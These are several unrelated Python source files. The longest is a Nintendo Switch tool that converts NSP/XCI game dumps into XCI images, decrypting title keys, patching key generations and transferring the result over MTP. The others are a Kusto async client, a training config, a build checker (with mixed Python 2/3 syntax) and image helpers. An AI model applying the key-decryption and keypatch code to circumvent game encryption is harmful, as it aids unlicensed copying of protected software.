1619008
|
import aes128
import Print
import os
import shutil
import json
import listmanager
from Fs import Nsp as squirrelNSP
from Fs import Xci as squirrelXCI
from Fs import factory
from Fs.Nca import NcaHeader
from Fs import Nca
from Fs.File import MemoryFile
from Fs import Ticket
import sq_tools
import io
from Fs import Type as FsType
import Keys
from binascii import hexlify as hx, unhexlify as uhx
from DBmodule import Exchange as exchangefile
import math
import subprocess
import sys
from mtp.wpd import is_switch_connected
from python_pick import pick
from python_pick import Picker
import csv
from tqdm import tqdm
import Print
def check_connection():
if not is_switch_connected():
sys.exit("Switch device isn't connected.\nCheck if mtp responder is running!!!")
bucketsize = 81920
# SET ENVIRONMENT
squirrel_dir=os.path.abspath(os.curdir)
NSCB_dir=os.path.abspath('../'+(os.curdir))
if os.path.exists(os.path.join(squirrel_dir,'ztools')):
NSCB_dir=squirrel_dir
zconfig_dir=os.path.join(NSCB_dir, 'zconfig')
ztools_dir=os.path.join(NSCB_dir,'ztools')
squirrel_dir=ztools_dir
elif os.path.exists(os.path.join(NSCB_dir,'ztools')):
squirrel_dir=squirrel_dir
ztools_dir=os.path.join(NSCB_dir, 'ztools')
zconfig_dir=os.path.join(NSCB_dir, 'zconfig')
else:
ztools_dir=os.path.join(NSCB_dir, 'ztools')
zconfig_dir=os.path.join(NSCB_dir, 'zconfig')
testroute1=os.path.join(squirrel_dir, "squirrel.py")
testroute2=os.path.join(squirrel_dir, "squirrel.exe")
urlconfig=os.path.join(zconfig_dir,'NUT_DB_URL.txt')
isExe=False
if os.path.exists(testroute1):
squirrel=testroute1
isExe=False
elif os.path.exists(testroute2):
squirrel=testroute2
isExe=True
bin_folder=os.path.join(ztools_dir, 'bin')
nscb_mtp=os.path.join(bin_folder, 'nscb_mtp.exe')
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if not os.path.exists(cachefolder):
os.makedirs(cachefolder)
games_installed_cache=os.path.join(cachefolder, 'games_installed.txt')
valid_saves_cache=os.path.join(cachefolder, 'valid_saves.txt')
mtp_source_lib=os.path.join(zconfig_dir,'mtp_source_libraries.txt')
mtp_internal_lib=os.path.join(zconfig_dir,'mtp_SD_libraries.txt')
storage_info=os.path.join(cachefolder, 'storage.csv')
download_lib_file = os.path.join(zconfig_dir, 'mtp_download_libraries.txt')
def get_header_size(flist):
properheadsize=0;sz=0;total_list=[]
for filepath in flist:
if filepath.endswith('xci') or filepath.endswith('xcz'):
files_list=sq_tools.ret_xci_offsets(filepath)
joined_list = [*total_list, *files_list]
total_list=joined_list
files=list();filesizes=list()
fplist=list()
for k in range(len(files_list)):
entry=files_list[k]
fplist.append(entry[0])
for i in range(len(files_list)):
entry=files_list[i]
cnmtfile=entry[0]
if cnmtfile.endswith('.cnmt.nca'):
f=squirrelXCI(filepath)
titleid,titleversion,base_ID,keygeneration,rightsId,RSV,RGV,ctype,metasdkversion,exesdkversion,hasHtmlManual,Installedsize,DeltaSize,ncadata=f.get_data_from_cnmt(cnmtfile)
for j in range(len(ncadata)):
row=ncadata[j]
# print(row)
if row['NCAtype']!='Meta':
test1=str(row['NcaId'])+'.nca';test2=str(row['NcaId'])+'.ncz'
if test1 in fplist or test2 in fplist:
# print(str(row['NcaId'])+'.nca')
files.append(str(row['NcaId'])+'.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
elif row['NCAtype']=='Meta':
# print(str(row['NcaId'])+'.cnmt.nca')
files.append(str(row['NcaId'])+'.cnmt.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
sec_hashlist=list()
try:
for file in files:
sha,size,gamecard=f.file_hash(file)
# print(sha)
if sha != False:
sec_hashlist.append(sha)
except BaseException as e:
Print.error('Exception: ' + str(e))
f.flush()
f.close()
xci_header,game_info,sig_padding,xci_certificate,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=sq_tools.get_xciheader(files,filesizes,sec_hashlist)
outheader=xci_header
outheader+=game_info
outheader+=sig_padding
outheader+=xci_certificate
outheader+=root_header
outheader+=upd_header
outheader+=norm_header
outheader+=sec_header
elif filepath.endswith('nsp') or filepath.endswith('nsz'):
files_list=sq_tools.ret_nsp_offsets(filepath)
joined_list = [*total_list, *files_list]
total_list=joined_list
files=list();filesizes=list()
fplist=list()
for k in range(len(files_list)):
entry=files_list[k]
fplist.append(entry[0])
for i in range(len(files_list)):
entry=files_list[i]
cnmtfile=entry[0]
if cnmtfile.endswith('.cnmt.nca'):
f=squirrelNSP(filepath)
titleid,titleversion,base_ID,keygeneration,rightsId,RSV,RGV,ctype,metasdkversion,exesdkversion,hasHtmlManual,Installedsize,DeltaSize,ncadata=f.get_data_from_cnmt(cnmtfile)
for j in range(len(ncadata)):
row=ncadata[j]
# print(row)
if row['NCAtype']!='Meta':
test1=str(row['NcaId'])+'.nca';test2=str(row['NcaId'])+'.ncz'
if test1 in fplist or test2 in fplist:
# print(str(row['NcaId'])+'.nca')
files.append(str(row['NcaId'])+'.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
elif row['NCAtype']=='Meta':
# print(str(row['NcaId'])+'.cnmt.nca')
files.append(str(row['NcaId'])+'.cnmt.nca')
filesizes.append(int(row['Size']))
sz+=int(row['Size'])
try:
sec_hashlist=list()
# print(files)
for file in files:
sha,size,gamecard=f.file_hash(file)
# print(sha)
if sha != False:
sec_hashlist.append(sha)
except BaseException as e:
Print.error('Exception: ' + str(e))
f.flush()
f.close()
xci_header,game_info,sig_padding,xci_certificate,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=sq_tools.get_xciheader(files,filesizes,sec_hashlist)
outheader=xci_header
outheader+=game_info
outheader+=sig_padding
outheader+=xci_certificate
outheader+=root_header
outheader+=upd_header
outheader+=norm_header
outheader+=sec_header
properheadsize=len(outheader)
return outheader,properheadsize,keygeneration,sz,files,total_list
def transfer_xci_csv(filepath,destiny="SD",cachefolder=None,override=False,keypatch=False):
check_connection()
if destiny=="SD":
destiny="1: External SD Card\\"
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
print(f"Creating xci for {filepath}")
xciname=gen_xci_parts(filepath,cachefolder=cachefolder,keypatch=keypatch)
destinypath=os.path.join(destiny,xciname)
files_csv=os.path.join(cachefolder, 'files.csv')
process=subprocess.Popen([nscb_mtp,"TransferfromCSV","-cs",files_csv,"-dst",destinypath])
# wait for the MTP transfer helper to finish
process.wait()
if os.path.exists(cachefolder):
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
def gen_xci_parts(filepath,cachefolder=None,keypatch=False):
if keypatch!=False:
try:
keypatch=int(keypatch)
except: keypatch=False
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if not os.path.exists(cachefolder):
os.makedirs(cachefolder)
else:
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
outheader,properheadsize,keygeneration,sz,files,files_list=get_header_size([filepath])
properheadsize=len(outheader)
# print(properheadsize)
# print(bucketsize)
i=0;sum=properheadsize;
if filepath.endswith('xci'):
xci=squirrelXCI(filepath)
outfile=os.path.join(cachefolder, "0")
outf = open(outfile, 'w+b')
outf.write(outheader)
written=0
for fi in files:
for nspF in xci.hfs0:
if str(nspF._path)=="secure":
for nca in nspF:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=xci.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
xci.flush()
xci.close()
elif filepath.endswith('nsp'):
nsp=squirrelNSP(filepath)
outfile=os.path.join(cachefolder, "0")
outf = open(outfile, 'w+b')
outf.write(outheader)
written=0
for fi in files:
for nca in nsp:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=nsp.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
nsp.flush()
nsp.close()
outf.flush()
outf.close()
tfile=os.path.join(cachefolder, "files.csv")
with open(tfile,'w') as csvfile:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format("step","filepath","size","targetsize","off1","off2"))
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(0,outfile,properheadsize+written,properheadsize,0,properheadsize))
k=0;l=0
for fi in files:
for j in files_list:
if j[0]==fi:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+1,outfile,properheadsize+written,0xC00,(properheadsize+l*0xC00),(properheadsize+(l*0xC00)+0xC00)))
off1=j[1]+0xC00
off2=j[2]
targetsize=j[3]-0xC00
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+2,filepath,(os.path.getsize(filepath)),targetsize,off1,off2))
break
k+=2;l+=1
xciname="test.xci"
try:
g=os.path.basename(filepath)
xciname=g[:-3]+'xci'
except:pass
return xciname
def transfer_mxci_csv(tfile=None,destiny="SD",cachefolder=None,override=False,keypatch=False,input_files=None):
check_connection()
if input_files==None and tfile==None:
sys.exit("Missing input!!!")
if destiny=="SD":
destiny="1: External SD Card\\"
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if input_files==None:
input_files=listmanager.read_lines_to_list(tfile,all=True)
print(f"Creating mxci from {tfile}")
xciname=gen_mxci_parts(input_files,cachefolder=cachefolder,keypatch=keypatch)
destinypath=os.path.join(destiny,xciname)
files_csv=os.path.join(cachefolder, 'files.csv')
process=subprocess.Popen([nscb_mtp,"TransferfromCSV","-cs",files_csv,"-dst",destinypath])
# wait for the MTP transfer helper to finish
process.wait()
if os.path.exists(cachefolder):
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
def gen_multi_file_header(prlist,filelist):
oflist=[];osizelist=[];ototlist=[];files=[]
totSize=0
for i in range(len(prlist)):
for j in prlist[i][4]:
el=j[0]
if el.endswith('.nca'):
oflist.append(j[0])
#print(j[0])
totSize = totSize+j[1]
#print(j[1])
ototlist.append(j[0])
sec_hashlist=list()
GClist=list()
# print(filelist)
for file in oflist:
for filepath in filelist:
if filepath.endswith('.nsp') or filepath.endswith('.nsz'):
try:
f = squirrelNSP(filepath)
sha,size,gamecard=f.file_hash(file)
if sha != False:
sec_hashlist.append(sha)
osizelist.append(size)
GClist.append([file,gamecard])
f.flush()
f.close()
except BaseException as e:
Print.error('Exception: ' + str(e))
if filepath.endswith('.xci') or filepath.endswith('.xcz'):
try:
f = squirrelXCI(filepath)
sha,size,gamecard=f.file_hash(file)
if sha != False:
sec_hashlist.append(sha)
osizelist.append(size)
GClist.append([file,gamecard])
f.flush()
f.close()
except BaseException as e:
Print.error('Exception: ' + str(e))
xci_header,game_info,sig_padding,xci_certificate,root_header,upd_header,norm_header,sec_header,rootSize,upd_multiplier,norm_multiplier,sec_multiplier=sq_tools.get_xciheader(oflist,osizelist,sec_hashlist)
totSize=len(xci_header)+len(game_info)+len(sig_padding)+len(xci_certificate)+rootSize
outheader=xci_header
outheader+=game_info
outheader+=sig_padding
outheader+=xci_certificate
outheader+=root_header
outheader+=upd_header
outheader+=norm_header
outheader+=sec_header
properheadsize=len(outheader)
return outheader,properheadsize,totSize,oflist
def gen_mxci_parts(input_files,cachefolder=None,keypatch=False):
from listmanager import calculate_name
if keypatch!=False:
try:
keypatch=int(keypatch)
except: keypatch=False
if cachefolder==None:
cachefolder=os.path.join(ztools_dir, '_mtp_cache_')
if not os.path.exists(cachefolder):
os.makedirs(cachefolder)
else:
for f in os.listdir(cachefolder):
fp = os.path.join(cachefolder, f)
try:
shutil.rmtree(fp)
except OSError:
os.remove(fp)
end_name,prlist=calculate_name(input_files,romanize=True,ext='.xci')
print(f"Calculated name {end_name}")
outheader,properheadsize,sz,files=gen_multi_file_header(prlist,input_files)
properheadsize=len(outheader)
outfile=os.path.join(cachefolder, "0")
outf = open(outfile, 'w+b')
outf.write(outheader)
# print(properheadsize)
# print(bucketsize)
i=0;sum=properheadsize;
for fi in files:
for filepath in input_files:
if filepath.endswith('xci'):
xci=squirrelXCI(filepath)
written=0
for nspF in xci.hfs0:
if str(nspF._path)=="secure":
for nca in nspF:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelXCI.get_new_cryptoblock(squirrelXCI,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=xci.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
xci.flush()
xci.close()
elif filepath.endswith('nsp'):
nsp=squirrelNSP(filepath)
written=0
for nca in nsp:
if nca._path==fi:
nca=Nca(nca)
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
crypto = aes128.AESECB(Keys.keyAreaKey(Keys.getMasterKeyIndex(masterKeyRev), nca.header.keyIndex))
hcrypto = aes128.AESXTS(uhx(Keys.get('header_key')))
gc_flag='00'*0x01
crypto1=nca.header.getCryptoType()
crypto2=nca.header.getCryptoType2()
if nca.header.getRightsId() != 0:
nca.rewind()
if crypto2>crypto1:
masterKeyRev=crypto2
if crypto2<=crypto1:
masterKeyRev=crypto1
from mtp_tools import get_nca_ticket
check,titleKey=get_nca_ticket(filepath,fi)
if check==False:
sys.exit("Can't verify titleckey")
titleKeyDec = Keys.decryptTitleKey(titleKey, Keys.getMasterKeyIndex(int(masterKeyRev)))
encKeyBlock = crypto.encrypt(titleKeyDec * 4)
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
if nca.header.getRightsId() == 0:
nca.rewind()
encKeyBlock = nca.header.getKeyBlock()
if str(keypatch) != "False":
t = tqdm(total=False, unit='B', unit_scale=False, leave=False)
if keypatch < nca.header.getCryptoType2():
encKeyBlock,crypto1,crypto2=squirrelNSP.get_new_cryptoblock(squirrelNSP,nca,keypatch,encKeyBlock,t)
t.close()
nca.rewind()
i=0
newheader=nsp.get_newheader(nca,encKeyBlock,crypto1,crypto2,hcrypto,gc_flag)
outf.write(newheader)
written+=len(newheader)
nca.seek(0xC00)
break
else:pass
nsp.flush()
nsp.close()
outf.flush()
outf.close()
tfile=os.path.join(cachefolder, "files.csv")
with open(tfile,'w') as csvfile:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format("step","filepath","size","targetsize","off1","off2"))
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(0,outfile,properheadsize+written,properheadsize,0,properheadsize))
k=0;l=0
for fi in files:
for filepath in input_files:
if filepath.endswith('xci'):
files_list=sq_tools.ret_xci_offsets(filepath)
elif filepath.endswith('nsp'):
files_list=sq_tools.ret_nsp_offsets(filepath)
for j in files_list:
if j[0]==fi:
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+1,outfile,properheadsize+written,0xC00,(properheadsize+l*0xC00),(properheadsize+(l*0xC00)+0xC00)))
off1=j[1]+0xC00
off2=j[2]
targetsize=j[3]-0xC00
csvfile.write("{}|{}|{}|{}|{}|{}\n".format(k+2,filepath,(os.path.getsize(filepath)),targetsize,off1,off2))
break
k+=2;l+=1
return end_name
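# Hedged usage sketch (not part of the original module): sending a single title
# to the console's SD card with the helpers above. The path below is a
# placeholder; transfer_xci_csv() builds the XCI parts in _mtp_cache_ and then
# drives nscb_mtp.exe, so the Switch must be connected over MTP first.
#
# transfer_xci_csv(r"C:\games\example.nsp", destiny="SD", keypatch=False)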
|
1619041
|
import io
from datetime import timedelta
from typing import Union, Optional
from .response import KustoStreamingResponseDataSet
from .._decorators import documented_by, aio_documented_by
from ..aio.streaming_response import StreamingDataSetEnumerator, JsonTokenReader
from ..client import KustoClient as KustoClientSync, _KustoClientBase, KustoConnectionStringBuilder, ClientRequestProperties, ExecuteRequestParams
from ..data_format import DataFormat
from ..exceptions import KustoAioSyntaxError
from ..response import KustoResponseDataSet
from ..security import _AadHelper
try:
from aiohttp import ClientResponse, ClientSession
except ImportError:
raise KustoAioSyntaxError()
@documented_by(KustoClientSync)
class KustoClient(_KustoClientBase):
@documented_by(KustoClientSync.__init__)
def __init__(self, kcsb: Union[KustoConnectionStringBuilder, str]):
super().__init__(kcsb)
# notice that in this context, federated actually just stands for add auth, not aad federated auth (legacy code)
self._auth_provider = _AadHelper(self._kcsb, is_async=True) if self._kcsb.aad_federated_security else None
self._session = ClientSession()
async def __aenter__(self) -> "KustoClient":
return self
def __aexit__(self, exc_type, exc_val, exc_tb):
return self._session.__aexit__(exc_type, exc_val, exc_tb)
@aio_documented_by(KustoClientSync.execute)
async def execute(self, database: str, query: str, properties: ClientRequestProperties = None) -> KustoResponseDataSet:
query = query.strip()
if query.startswith("."):
return await self.execute_mgmt(database, query, properties)
return await self.execute_query(database, query, properties)
@aio_documented_by(KustoClientSync.execute_query)
async def execute_query(self, database: str, query: str, properties: ClientRequestProperties = None) -> KustoResponseDataSet:
return await self._execute(self._query_endpoint, database, query, None, KustoClient._query_default_timeout, properties)
@aio_documented_by(KustoClientSync.execute_mgmt)
async def execute_mgmt(self, database: str, query: str, properties: ClientRequestProperties = None) -> KustoResponseDataSet:
return await self._execute(self._mgmt_endpoint, database, query, None, KustoClient._mgmt_default_timeout, properties)
@aio_documented_by(KustoClientSync.execute_streaming_ingest)
async def execute_streaming_ingest(
self,
database: str,
table: str,
stream: io.IOBase,
stream_format: Union[DataFormat, str],
properties: ClientRequestProperties = None,
mapping_name: str = None,
):
stream_format = stream_format.kusto_value if isinstance(stream_format, DataFormat) else DataFormat[stream_format.upper()].kusto_value
endpoint = self._streaming_ingest_endpoint + database + "/" + table + "?streamFormat=" + stream_format
if mapping_name is not None:
endpoint = endpoint + "&mappingName=" + mapping_name
await self._execute(endpoint, database, None, stream, self._streaming_ingest_default_timeout, properties)
@aio_documented_by(KustoClientSync._execute_streaming_query_parsed)
async def _execute_streaming_query_parsed(
self, database: str, query: str, timeout: timedelta = _KustoClientBase._query_default_timeout, properties: Optional[ClientRequestProperties] = None
) -> StreamingDataSetEnumerator:
response = await self._execute(self._query_endpoint, database, query, None, timeout, properties, stream_response=True)
return StreamingDataSetEnumerator(JsonTokenReader(response.content))
@aio_documented_by(KustoClientSync.execute_streaming_query)
async def execute_streaming_query(
self, database: str, query: str, timeout: timedelta = _KustoClientBase._query_default_timeout, properties: Optional[ClientRequestProperties] = None
) -> KustoStreamingResponseDataSet:
response = await self._execute_streaming_query_parsed(database, query, timeout, properties)
return KustoStreamingResponseDataSet(response)
@aio_documented_by(KustoClientSync._execute)
async def _execute(
self,
endpoint: str,
database: str,
query: Optional[str],
payload: Optional[io.IOBase],
timeout: timedelta,
properties: ClientRequestProperties = None,
stream_response: bool = False,
) -> Union[KustoResponseDataSet, ClientResponse]:
"""Executes given query against this client"""
request_params = ExecuteRequestParams(database, payload, properties, query, timeout, self._request_headers)
json_payload = request_params.json_payload
request_headers = request_params.request_headers
timeout = request_params.timeout
if self._auth_provider:
request_headers["Authorization"] = await self._auth_provider.acquire_authorization_header_async()
response = await self._session.post(endpoint, headers=request_headers, data=payload, json=json_payload, timeout=timeout.seconds)
if stream_response:
try:
response.raise_for_status()
return response
except Exception as e:
try:
response_text = await response.text()
except Exception:
response_text = None
try:
response_json = await response.json()
except Exception:
response_json = None
raise self._handle_http_error(e, endpoint, payload, response, response.status, response_json, response_text)
async with response:
response_json = None
try:
response_json = await response.json()
response.raise_for_status()
except Exception as e:
try:
response_text = await response.text()
except Exception:
response_text = None
raise self._handle_http_error(e, endpoint, payload, response, response.status, response_json, response_text)
return self._kusto_parse_by_endpoint(endpoint, response_json)
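# Hedged usage sketch (not part of the original module), assuming the public
# azure-kusto-data API: the cluster URL, database and query below are
# placeholders, and device authentication is just one of the available
# KustoConnectionStringBuilder factories.
#
# import asyncio
# from azure.kusto.data import KustoConnectionStringBuilder
# from azure.kusto.data.aio import KustoClient
#
# async def main():
#     kcsb = KustoConnectionStringBuilder.with_aad_device_authentication("https://help.kusto.windows.net")
#     async with KustoClient(kcsb) as client:
#         response = await client.execute("Samples", "StormEvents | take 10")
#         for row in response.primary_results[0]:
#             print(row)
#
# asyncio.run(main())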
|
1619082
|
import os
import sys
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(__file__)))))
sys.path.append(BASE_DIR)
from tools.path import ILSVRC2012_path
from simpleAICV.classification import backbones
from simpleAICV.classification import losses
import torchvision.transforms as transforms
import torchvision.datasets as datasets
class config:
train_dataset_path = os.path.join(ILSVRC2012_path, 'train')
val_dataset_path = os.path.join(ILSVRC2012_path, 'val')
network = 'efficientnet_b0'
pretrained = False
num_classes = 1000
input_image_size = 224
scale = 256 / 224
model = backbones.__dict__[network](**{
'pretrained': pretrained,
'num_classes': num_classes,
})
criterion = losses.__dict__['CELoss']()
train_dataset = datasets.ImageFolder(
train_dataset_path,
transforms.Compose([
transforms.RandomResizedCrop(input_image_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
]))
val_dataset = datasets.ImageFolder(
val_dataset_path,
transforms.Compose([
transforms.Resize(int(input_image_size * scale)),
transforms.CenterCrop(input_image_size),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225]),
]))
# val_dataset.class_to_idx stores the index assigned to each class; a "class" is the name of each sub-folder, and the index is the target used during training
seed = 0
# batch_size is total size in DataParallel mode
# batch_size is per gpu node size in DistributedDataParallel mode
batch_size = 64
num_workers = 16
# choose 'SGD' or 'AdamW'
optimizer = 'SGD'
# 'AdamW' doesn't need gamma and momentum variable
gamma = 0.1
momentum = 0.9
# choose 'MultiStepLR' or 'CosineLR'
# milestones only use in 'MultiStepLR'
scheduler = 'CosineLR'
lr = 0.1
weight_decay = 1e-4
milestones = [30, 60]
warm_up_epochs = 5
epochs = 90
accumulation_steps = 1
print_interval = 10
# only in DistributedDataParallel mode can use sync_bn
distributed = True
sync_bn = False
apex = True
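# Hedged sketch (not part of the original config): the training script is
# expected to wrap these datasets in DataLoaders, roughly as below; the
# shuffle/pin_memory settings are assumptions, not taken from the repo.
#
# from torch.utils.data import DataLoader
# train_loader = DataLoader(config.train_dataset, batch_size=config.batch_size,
#                           shuffle=True, num_workers=config.num_workers, pin_memory=True)
# val_loader = DataLoader(config.val_dataset, batch_size=config.batch_size,
#                         shuffle=False, num_workers=config.num_workers, pin_memory=True)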
|
1619088
|
import os, sys
sys.path.append(os.path.realpath(os.path.dirname(__file__)))
import reaper_pp
import glm_pp
|
1619098
|
import sys
import subprocess
import re
pal_warn = re.compile("Warning.*pal")
pal_dont_treat_as_warn = re.compile("Warning.*PAL_INSECURE")
proc = subprocess.Popen(sys.argv[1].split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
for line in proc.stdout:
print(line, end='')
if len(pal_warn.findall(line)) > 0:
if not len(pal_dont_treat_as_warn.findall(line)) > 0:
raise Exception("No Warnings Allowed in Pal")
proc.wait()
print "mbed compile returned {}".format(proc.returncode)
if not proc.returncode == 0:
raise Exception("mbed compile failed")
|
1619103
|
import numpy as np
from deep_utils.utils.box_utils.boxes import Point
class VideoWriterCV:
def __init__(self, save_path, width, height, fourcc="XVID", fps=30, colorful=True, in_source='Numpy'):
import cv2
point = Point.point2point((width, height), in_source=in_source, to_source=Point.PointSource.CV)
fourcc = cv2.VideoWriter_fourcc(*fourcc) if isinstance(fourcc, str) else fourcc
self.vw = cv2.VideoWriter(save_path, fourcc, fps, point, colorful)
def write(self, frame):
self.vw.write(frame)
def rotate(img, rotation_degree, center_point=None, scale=1.0, dsize=None, bound=False, clockwise=True):
import cv2
h, w = img.shape[:2]
(w, h) = dsize = (w, h) if dsize is None else dsize
center_point = (w // 2, h // 2) if center_point is None else center_point
# negative angle >> clockwise rotation | positive angle >> counter clockwise rotation
rotation_degree = -rotation_degree if clockwise else rotation_degree
m = cv2.getRotationMatrix2D(center_point, rotation_degree, scale)
if bound:
h, w = img.shape[:2]
cos = abs(m[0, 0])
sin = abs(m[0, 1])
w_ = int((cos * w) + (sin * h))
h_ = int((cos * h) + (sin * w))
m[0, 2] += w_ // 2 - w // 2
m[1, 2] += h_ // 2 - h // 2
dsize = (w_, h_)
rotated = cv2.warpAffine(img, m, dsize)
return rotated
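# Hedged usage sketch: rotate an image 30 degrees clockwise about its centre,
# growing the canvas with bound=True so no corners are clipped. The file name
# is a placeholder.
#
# import cv2
# img = cv2.imread("example.jpg")
# rotated = rotate(img, 30, bound=True, clockwise=True)
# cv2.imwrite("example_rotated.jpg", rotated)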
def translate(img, tx, ty, dsize=None):
import cv2
h, w = img.shape[:2]
dsize = (w, h) if dsize is None else dsize
translation_matrix = np.array([
[1, 0, tx],
[0, 1, ty]], dtype=np.float32)
translated_image = cv2.warpAffine(src=img, M=translation_matrix, dsize=dsize)
return translated_image
